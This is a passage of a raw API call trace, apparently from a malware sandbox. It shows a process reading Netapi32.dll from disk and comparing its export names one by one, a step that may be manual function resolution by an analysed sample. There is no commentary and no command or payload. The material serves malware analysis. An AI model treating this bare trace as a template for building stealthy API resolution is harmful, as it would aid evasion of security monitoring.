lpString2="DnsAllocateRecord") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0263.498] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0263.498] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0263.498] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0263.498] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0263.498] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0263.498] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0263.498] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0263.498] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0263.498] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0263.498] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0263.498] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0263.498] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0263.498] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0263.498] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.498] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.498] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0263.498] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0263.498] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.498] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0263.498] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0263.498] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0263.498] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0263.498] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0263.498] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0263.498] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0263.498] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0263.499] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0263.499] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0263.499] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0263.499] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0263.499] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0263.499] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0263.499] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0263.499] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0263.499] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0263.500] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0263.512] GetProcessHeap () returned 0x4a0000 [0263.512] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3acd010 | out: hHeap=0x4a0000) returned 1 [0263.512] GetProcessHeap () returned 0x4a0000 [0263.512] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9140 [0263.513] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0263.517] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0263.517] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0263.518] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0263.518] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0263.518] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0263.518] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0263.518] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0263.518] GetProcessHeap () returned 0x4a0000 [0263.519] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13b00) returned 0x2d95030 [0263.519] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0263.519] ReadFile (in: hFile=0x17c, lpBuffer=0x2d95030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d95030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0263.618] CloseHandle (hObject=0x17c) returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0263.619] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0263.620] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0263.621] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0263.622] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0263.623] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0263.624] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0263.625] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", 